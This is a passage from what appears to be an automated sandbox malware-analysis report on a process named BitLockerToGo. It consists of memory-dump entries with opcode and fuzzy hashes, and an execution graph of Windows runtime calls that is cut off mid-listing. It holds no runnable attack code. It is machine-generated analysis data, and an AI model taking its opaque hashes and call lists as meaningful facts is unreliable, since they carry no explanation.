                                                                                                                                                                                                                                • Source File: 00000013.00000002.1980419555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_19_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 2c1b20354643bb70c82c38ce66bcc06b01ef6c7f223a1dabd06f5e08c73ab3f5
                                                                                                                                                                                                                                • Instruction ID: 754f8bfc64ab73253d0d87c642e29389b57dede52406e758257a0e4dc470b1d8
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2c1b20354643bb70c82c38ce66bcc06b01ef6c7f223a1dabd06f5e08c73ab3f5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 712159B46006058BD330CF29C880AA6FBF2EF9A301B24881DD2D5D7351C739A982CB98
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000013.00000002.1980419555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_19_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                                • Instruction ID: 90b1c6d1427caa055616c6684f2bdb14c9f5b8c54198674c9e93345a933cbd44
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B911EC336055D40EC3198D3C84006657F930AB7239F59939AF4F89B2D6D5268DCB8359
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000013.00000002.1980419555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_19_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: fcb3747ca83bd28b49bcde1451be7433e139fb4e7c31ee2abb16e8a4cae9ece9
                                                                                                                                                                                                                                • Instruction ID: ce8d760b59be77e8ab8cb5d6795228d1a75396e36a97a8a5589d23c2fbe080da
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: fcb3747ca83bd28b49bcde1451be7433e139fb4e7c31ee2abb16e8a4cae9ece9
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9A01B5F170031247D7209F21A9C0727B2A85F4070CF09053EED0857742DB7DEC28869A
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000013.00000002.1980419555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_19_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 8b030cb538b546e9b1b9d2c4a89a5386a7ea49839a3ca361c5d06c4402b934a0
                                                                                                                                                                                                                                • Instruction ID: 5fd4e0e3e07cddc6160fdaad35072a938d6c1072a59745fe9acae018d8c4fb71
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8b030cb538b546e9b1b9d2c4a89a5386a7ea49839a3ca361c5d06c4402b934a0
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 81F0A7B2A0411067DB2389559C91BB7BBAECB9B254F19145AE84767202D2699CC0C2FD
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000013.00000002.1980419555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_19_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: bfd68271665ce22f023fcc713d1e46e09effc898f2f4aaafbf18a61c52b86b2e
                                                                                                                                                                                                                                • Instruction ID: 08a42f53c3cbe0526b99d044d0921eba6c8637d552aa90cf4dfaa8e4c0ff26db
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bfd68271665ce22f023fcc713d1e46e09effc898f2f4aaafbf18a61c52b86b2e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A2E086F5C40500BAF7212B216C02F3B7465EB43219F640439F92422162E6268521495F
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000013.00000002.1980419555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_19_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
                                                                                                                                                                                                                                • Instruction ID: ec085f6a06f7d4cd61a533c9067cf8d86fb86cbcd0777470dbeaeb2e3f16263e
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a4b5204e339133bf84330416a5308528dd9e98d6cb7a6fcb91640552a86da4e7
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FBD05E21648721469B688E19A405977F7E4EA8BB11F4AA55FF5C2E3248E234DC41C2AE
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000013.00000002.1980419555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_19_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                • Opcode ID: 86afff095f5dff309afba50e709b1a29a90a50dd9fb733620ca14d8ec8f130ca
                                                                                                                                                                                                                                • Instruction ID: d3308612148e6e2d93de2cdb7e04f939902484079d19e320f9ef599efe334241
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 86afff095f5dff309afba50e709b1a29a90a50dd9fb733620ca14d8ec8f130ca
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C5900225D491408681488F009450474E339564F101E10701D8009338514A60D400850C
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000013.00000002.1980419555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_19_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocString
                                                                                                                                                                                                                                • String ID: !$#$%$&$'$)$+$,$-$0$0$3$8$8$<$?$?$O$Q$S$S$U$W$W$X$Y$[$]$_
                                                                                                                                                                                                                                • API String ID: 2525500382-1121791624
                                                                                                                                                                                                                                • Opcode ID: 6af8efc433bfb27d15dc7bb6503aba118980e6ab2a2b2552fdf04435285f224f
                                                                                                                                                                                                                                • Instruction ID: 8e3c41c7247833e13c6bef0269b32f08175f5d0e54982d88ec276805ed871663
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6af8efc433bfb27d15dc7bb6503aba118980e6ab2a2b2552fdf04435285f224f
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3FA1907040CBC1CAD3768B3898587DBBFD15BA6328F484A9DD1EC4A3D2C6754149CB67
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000013.00000002.1980419555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_19_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Variant$ClearInit
                                                                                                                                                                                                                                • String ID: $$($*$+$.$:$A$I$Q$Y$v
                                                                                                                                                                                                                                • API String ID: 2610073882-2465205239
                                                                                                                                                                                                                                • Opcode ID: 0b62bb64f09a05e27ced884bb17ba9c14ea9e78b7b138e0dd398828548c68973
                                                                                                                                                                                                                                • Instruction ID: 5011c9ff6a08551f1982c9e1d5846eb61fa09d93201ae0283a78afb9cba0b36d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0b62bb64f09a05e27ced884bb17ba9c14ea9e78b7b138e0dd398828548c68973
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D041F67010C7C18ED362DB28848839BBFE0AB9A328F845A5DF4E847392C7759545CB57
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000013.00000002.1980419555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_19_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Variant$ClearInit
                                                                                                                                                                                                                                • String ID: $$($*$+$.$:$A$I$Q$Y$v
                                                                                                                                                                                                                                • API String ID: 2610073882-2465205239
                                                                                                                                                                                                                                • Opcode ID: 0f42f3d445aad7e73ef81433df65768feaf43f9966699f753612cc45f9964bd9
                                                                                                                                                                                                                                • Instruction ID: e322c505998c613560a2ec80dcf9ffbecaaff8c0e7ebd3d38e7fc181cfdc6bef
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0f42f3d445aad7e73ef81433df65768feaf43f9966699f753612cc45f9964bd9
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1341F47000C7C1CED362DB28848874ABFE0AB9A328F881A8DF5E8473A2C7759545CB57
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000013.00000002.1980419555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_19_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Variant$ClearInit
                                                                                                                                                                                                                                • String ID: P$U$Y$[$_$e$g$o$o$r
                                                                                                                                                                                                                                • API String ID: 2610073882-1510115413
                                                                                                                                                                                                                                • Opcode ID: 4f0c6d36ee9a4b208b3e86be7eed7203ecda3b8ebf68111b18cd878b26091aba
                                                                                                                                                                                                                                • Instruction ID: 9fe55671e3915e1e91bcfeb99feffca42d31eecdcef79aa6af4ce0557c9cb30c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4f0c6d36ee9a4b208b3e86be7eed7203ecda3b8ebf68111b18cd878b26091aba
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DC51C42410C7C2CED331DB6C8858B9BBFE0AB96224F084E5EE4E99B2D2C7755105CB23
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000013.00000002.1980419555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_19_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: InitVariant
                                                                                                                                                                                                                                • String ID: 2$3$3$5$8$Q
                                                                                                                                                                                                                                • API String ID: 1927566239-3010245564
                                                                                                                                                                                                                                • Opcode ID: eaa2cc83d8b43d91e0d0c9c345a4d28f06855a6fadafc3419db35a0ebfd0007e
                                                                                                                                                                                                                                • Instruction ID: c0b6c747335f7e0ad95d2dfaa6439d3a8d567ed42b7d046bfd676333e0dcb1e6
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: eaa2cc83d8b43d91e0d0c9c345a4d28f06855a6fadafc3419db35a0ebfd0007e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CB31D47040C7C1CED332DB288458BDABBE0ABAA314F448E5DD4D847382C7B55586CB67
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000013.00000002.1980419555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_19_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Variant$ClearInit
                                                                                                                                                                                                                                • String ID: )$/$8
                                                                                                                                                                                                                                • API String ID: 2610073882-3478706916
                                                                                                                                                                                                                                • Opcode ID: aaa256fc69b14fa9197a8a80e8ad7e26d106a42bd64e37c3b10957e1df1c53f9
                                                                                                                                                                                                                                • Instruction ID: 2d9210edc2beed78d1ba113a4dedd64414e7232f9f0f7889e84a1c5a0cdf5c04
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: aaa256fc69b14fa9197a8a80e8ad7e26d106a42bd64e37c3b10957e1df1c53f9
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3F41C570008BC1CED726DF388498616BFE16F1A214F088A9DD8E94F396C774E519DBA6
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000013.00000002.1980419555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_19_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Variant$ClearInit
                                                                                                                                                                                                                                • String ID: )$/$8
                                                                                                                                                                                                                                • API String ID: 2610073882-3478706916
                                                                                                                                                                                                                                • Opcode ID: e64e2b2010943960ee4360020d9a928f78686caf1da96c22f281f72fe758fca8
                                                                                                                                                                                                                                • Instruction ID: 306e827258d49508417e0b8588ba0824f453d59bc88937173c2da632d1e5003c
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e64e2b2010943960ee4360020d9a928f78686caf1da96c22f281f72fe758fca8
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0141E770008B81CEC721DF3C8488756BFE06B16314F088A9DE8E98F39BC7759519DBA6
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000013.00000002.1980419555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_19_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                • String ID: :
                                                                                                                                                                                                                                • API String ID: 0-336475711
                                                                                                                                                                                                                                • Opcode ID: e25fbcf8a74d151bf91c583ca8e186b4d9de6685e863e1ab763ca49ca1a3d4d1
                                                                                                                                                                                                                                • Instruction ID: 7834bb723261e3b45e5d34d537f4c4483a30bc8e6588b3d47e756c9be46d9ad7
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e25fbcf8a74d151bf91c583ca8e186b4d9de6685e863e1ab763ca49ca1a3d4d1
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0D3137B4108341AFE3248F10C895B5BBBF4EB86369F40592DF69917291CBB49845CF9B
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(39853B85), ref: 0043875E
                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(39853B85), ref: 0043882C
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000013.00000002.1980419555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_19_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocString
                                                                                                                                                                                                                                • String ID: _E
                                                                                                                                                                                                                                • API String ID: 2525500382-3355363116
                                                                                                                                                                                                                                • Opcode ID: 5c0b5da5a97354dbe63401c1816fd8086e9c3560689afb3150f207d4f1763260
                                                                                                                                                                                                                                • Instruction ID: 0a9441778b7361e2fdd8e4b85269def2c7d68d9bcfadd74ea1afeeba7a2bc9a0
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5c0b5da5a97354dbe63401c1816fd8086e9c3560689afb3150f207d4f1763260
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6341F0B46083809FD325EF28D890A2EBBF1EF96344F50591DE1C59B361CB79A802CF56
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000013.00000002.1980419555.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_19_2_400000_BitLockerToGo.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: MetricsSystem
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 4116985748-3916222277
                                                                                                                                                                                                                                • Opcode ID: 8405aaf5521bcc1f4bc6a454d966859ad34ccf5626db9e9cbc63f5d3344b273b
                                                                                                                                                                                                                                • Instruction ID: 2f42052b1127837a3fc8d35936a410db84e15ad36566a81ab5bc986541124283
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8405aaf5521bcc1f4bc6a454d966859ad34ccf5626db9e9cbc63f5d3344b273b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 013181B49143548FDB00EF68D98565EBBF4FF8A304F12852DE488DB360D774A948CB86

                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                Execution Coverage:6%
                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                                                                Total number of Nodes:2000
                                                                                                                                                                                                                                Total number of Limit Nodes:23
                                                                                                                                                                                                                                execution_graph 16477 7ff6aae35628 16478 7ff6aae3565f 16477->16478 16479 7ff6aae35642 16477->16479 16478->16479 16480 7ff6aae35672 CreateFileW 16478->16480 16502 7ff6aae34ee8 16479->16502 16482 7ff6aae356a6 16480->16482 16483 7ff6aae356dc 16480->16483 16511 7ff6aae3577c GetFileType 16482->16511 16537 7ff6aae35c04 16483->16537 16492 7ff6aae356bb CloseHandle 16497 7ff6aae3565a 16492->16497 16493 7ff6aae356d1 CloseHandle 16493->16497 16494 7ff6aae35710 16563 7ff6aae359c4 16494->16563 16495 7ff6aae356e5 16558 7ff6aae34e7c 16495->16558 16501 7ff6aae356ef 16501->16497 16580 7ff6aae3b2c8 GetLastError 16502->16580 16504 7ff6aae34ef1 16505 7ff6aae34f08 16504->16505 16506 7ff6aae3b2c8 memcpy_s 11 API calls 16505->16506 16507 7ff6aae34f11 16506->16507 16508 7ff6aae3a8e0 16507->16508 16638 7ff6aae3a778 16508->16638 16510 7ff6aae3a8f9 16510->16497 16512 7ff6aae35887 16511->16512 16513 7ff6aae357ca 16511->16513 16515 7ff6aae358b1 16512->16515 16516 7ff6aae3588f 16512->16516 16514 7ff6aae357f6 GetFileInformationByHandle 16513->16514 16517 7ff6aae35b00 21 API calls 16513->16517 16518 7ff6aae3581f 16514->16518 16519 7ff6aae358a2 GetLastError 16514->16519 16521 7ff6aae358d4 PeekNamedPipe 16515->16521 16528 7ff6aae35872 16515->16528 16516->16519 16520 7ff6aae35893 16516->16520 16522 7ff6aae357e4 16517->16522 16523 7ff6aae359c4 51 API calls 16518->16523 16525 7ff6aae34e7c _fread_nolock 11 API calls 16519->16525 16524 7ff6aae34f08 memcpy_s 11 API calls 16520->16524 16521->16528 16522->16514 16522->16528 16527 7ff6aae3582a 16523->16527 16524->16528 16525->16528 16526 7ff6aae2c550 _log10_special 8 API calls 16529 7ff6aae356b4 16526->16529 16704 7ff6aae35924 16527->16704 16528->16526 16529->16492 16529->16493 16532 7ff6aae35924 10 API calls 16533 7ff6aae35849 16532->16533 16534 7ff6aae35924 10 API calls 16533->16534 16535 7ff6aae3585a 16534->16535 16535->16528 16536 7ff6aae34f08 memcpy_s 11 API calls 16535->16536 16536->16528 16538 7ff6aae35c3a 16537->16538 16539 7ff6aae35cd2 __vcrt_freefls 16538->16539 16540 7ff6aae34f08 memcpy_s 11 API calls 16538->16540 16541 7ff6aae2c550 _log10_special 8 API calls 16539->16541 16542 7ff6aae35c4c 16540->16542 16543 7ff6aae356e1 16541->16543 16544 7ff6aae34f08 memcpy_s 11 API calls 16542->16544 16543->16494 16543->16495 16545 7ff6aae35c54 16544->16545 16711 7ff6aae37e08 16545->16711 16547 7ff6aae35c69 16548 7ff6aae35c7b 16547->16548 16549 7ff6aae35c71 16547->16549 16551 7ff6aae34f08 memcpy_s 11 API calls 16548->16551 16550 7ff6aae34f08 memcpy_s 11 API calls 16549->16550 16557 7ff6aae35c76 16550->16557 16552 7ff6aae35c80 16551->16552 16552->16539 16553 7ff6aae34f08 memcpy_s 11 API calls 16552->16553 16554 7ff6aae35c8a 16553->16554 16556 7ff6aae37e08 45 API calls 16554->16556 16555 7ff6aae35cc4 GetDriveTypeW 16555->16539 16556->16557 16557->16539 16557->16555 16559 7ff6aae3b2c8 memcpy_s 11 API calls 16558->16559 16560 7ff6aae34e89 __free_lconv_num 16559->16560 16561 7ff6aae3b2c8 memcpy_s 11 API calls 16560->16561 16562 7ff6aae34eab 16561->16562 16562->16501 16565 7ff6aae359ec 16563->16565 16564 7ff6aae3571d 16573 7ff6aae35b00 16564->16573 16565->16564 16805 7ff6aae3f724 16565->16805 16567 7ff6aae35a80 16567->16564 16568 7ff6aae3f724 51 API calls 16567->16568 16569 7ff6aae35a93 16568->16569 16569->16564 16570 7ff6aae3f724 51 API calls 16569->16570 16571 7ff6aae35aa6 16570->16571 16571->16564 16572 7ff6aae3f724 51 API calls 16571->16572 16572->16564 16574 7ff6aae35b1a 16573->16574 16575 7ff6aae35b51 16574->16575 16576 7ff6aae35b2a 16574->16576 16577 7ff6aae3f5b8 21 API calls 16575->16577 16578 7ff6aae34e7c _fread_nolock 11 API calls 16576->16578 16579 7ff6aae35b3a 16576->16579 16577->16579 16578->16579 16579->16501 16581 7ff6aae3b309 FlsSetValue 16580->16581 16587 7ff6aae3b2ec 16580->16587 16582 7ff6aae3b31b 16581->16582 16586 7ff6aae3b2f9 SetLastError 16581->16586 16597 7ff6aae3eb98 16582->16597 16586->16504 16587->16581 16587->16586 16588 7ff6aae3b348 FlsSetValue 16591 7ff6aae3b366 16588->16591 16592 7ff6aae3b354 FlsSetValue 16588->16592 16589 7ff6aae3b338 FlsSetValue 16590 7ff6aae3b341 16589->16590 16604 7ff6aae3a948 16590->16604 16610 7ff6aae3aef4 16591->16610 16592->16590 16602 7ff6aae3eba9 memcpy_s 16597->16602 16598 7ff6aae3ebfa 16601 7ff6aae34f08 memcpy_s 10 API calls 16598->16601 16599 7ff6aae3ebde HeapAlloc 16600 7ff6aae3b32a 16599->16600 16599->16602 16600->16588 16600->16589 16601->16600 16602->16598 16602->16599 16615 7ff6aae43590 16602->16615 16605 7ff6aae3a94d HeapFree 16604->16605 16609 7ff6aae3a97c 16604->16609 16606 7ff6aae3a968 GetLastError 16605->16606 16605->16609 16607 7ff6aae3a975 __free_lconv_num 16606->16607 16608 7ff6aae34f08 memcpy_s 9 API calls 16607->16608 16608->16609 16609->16586 16624 7ff6aae3adcc 16610->16624 16618 7ff6aae435d0 16615->16618 16623 7ff6aae402d8 EnterCriticalSection 16618->16623 16636 7ff6aae402d8 EnterCriticalSection 16624->16636 16639 7ff6aae3a7a3 16638->16639 16642 7ff6aae3a814 16639->16642 16641 7ff6aae3a7ca 16641->16510 16652 7ff6aae3a55c 16642->16652 16646 7ff6aae3a84f 16646->16641 16653 7ff6aae3a578 GetLastError 16652->16653 16654 7ff6aae3a5b3 16652->16654 16655 7ff6aae3a588 16653->16655 16654->16646 16658 7ff6aae3a5c8 16654->16658 16665 7ff6aae3b390 16655->16665 16659 7ff6aae3a5fc 16658->16659 16660 7ff6aae3a5e4 GetLastError SetLastError 16658->16660 16659->16646 16661 7ff6aae3a900 IsProcessorFeaturePresent 16659->16661 16660->16659 16662 7ff6aae3a913 16661->16662 16682 7ff6aae3a614 16662->16682 16666 7ff6aae3b3ca FlsSetValue 16665->16666 16667 7ff6aae3b3af FlsGetValue 16665->16667 16669 7ff6aae3b3d7 16666->16669 16670 7ff6aae3a5a3 SetLastError 16666->16670 16668 7ff6aae3b3c4 16667->16668 16667->16670 16668->16666 16671 7ff6aae3eb98 memcpy_s 11 API calls 16669->16671 16670->16654 16672 7ff6aae3b3e6 16671->16672 16673 7ff6aae3b404 FlsSetValue 16672->16673 16674 7ff6aae3b3f4 FlsSetValue 16672->16674 16675 7ff6aae3b410 FlsSetValue 16673->16675 16676 7ff6aae3b422 16673->16676 16677 7ff6aae3b3fd 16674->16677 16675->16677 16679 7ff6aae3aef4 memcpy_s 11 API calls 16676->16679 16678 7ff6aae3a948 __free_lconv_num 11 API calls 16677->16678 16678->16670 16680 7ff6aae3b42a 16679->16680 16681 7ff6aae3a948 __free_lconv_num 11 API calls 16680->16681 16681->16670 16683 7ff6aae3a64e _isindst memcpy_s 16682->16683 16684 7ff6aae3a676 RtlCaptureContext RtlLookupFunctionEntry 16683->16684 16685 7ff6aae3a6e6 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 16684->16685 16686 7ff6aae3a6b0 RtlVirtualUnwind 16684->16686 16687 7ff6aae3a738 _isindst 16685->16687 16686->16685 16690 7ff6aae2c550 16687->16690 16691 7ff6aae2c559 16690->16691 16692 7ff6aae2c564 GetCurrentProcess TerminateProcess 16691->16692 16693 7ff6aae2c8e0 IsProcessorFeaturePresent 16691->16693 16694 7ff6aae2c8f8 16693->16694 16699 7ff6aae2cad8 RtlCaptureContext 16694->16699 16700 7ff6aae2caf2 RtlLookupFunctionEntry 16699->16700 16701 7ff6aae2cb08 RtlVirtualUnwind 16700->16701 16702 7ff6aae2c90b 16700->16702 16701->16700 16701->16702 16703 7ff6aae2c8a0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 16702->16703 16705 7ff6aae3594d FileTimeToSystemTime 16704->16705 16706 7ff6aae35940 16704->16706 16707 7ff6aae35961 SystemTimeToTzSpecificLocalTime 16705->16707 16708 7ff6aae35948 16705->16708 16706->16705 16706->16708 16707->16708 16709 7ff6aae2c550 _log10_special 8 API calls 16708->16709 16710 7ff6aae35839 16709->16710 16710->16532 16712 7ff6aae37e24 16711->16712 16713 7ff6aae37e92 16711->16713 16712->16713 16715 7ff6aae37e29 16712->16715 16748 7ff6aae407c0 16713->16748 16717 7ff6aae37e41 16715->16717 16718 7ff6aae37e5e 16715->16718 16716 7ff6aae37e56 __vcrt_freefls 16716->16547 16723 7ff6aae37bd8 GetFullPathNameW 16717->16723 16731 7ff6aae37c4c GetFullPathNameW 16718->16731 16724 7ff6aae37bfe GetLastError 16723->16724 16725 7ff6aae37c14 16723->16725 16726 7ff6aae34e7c _fread_nolock 11 API calls 16724->16726 16727 7ff6aae37c10 16725->16727 16730 7ff6aae34f08 memcpy_s 11 API calls 16725->16730 16728 7ff6aae37c0b 16726->16728 16727->16716 16729 7ff6aae34f08 memcpy_s 11 API calls 16728->16729 16729->16727 16730->16727 16732 7ff6aae37c7f GetLastError 16731->16732 16736 7ff6aae37c95 __vcrt_freefls 16731->16736 16733 7ff6aae34e7c _fread_nolock 11 API calls 16732->16733 16734 7ff6aae37c8c 16733->16734 16735 7ff6aae34f08 memcpy_s 11 API calls 16734->16735 16737 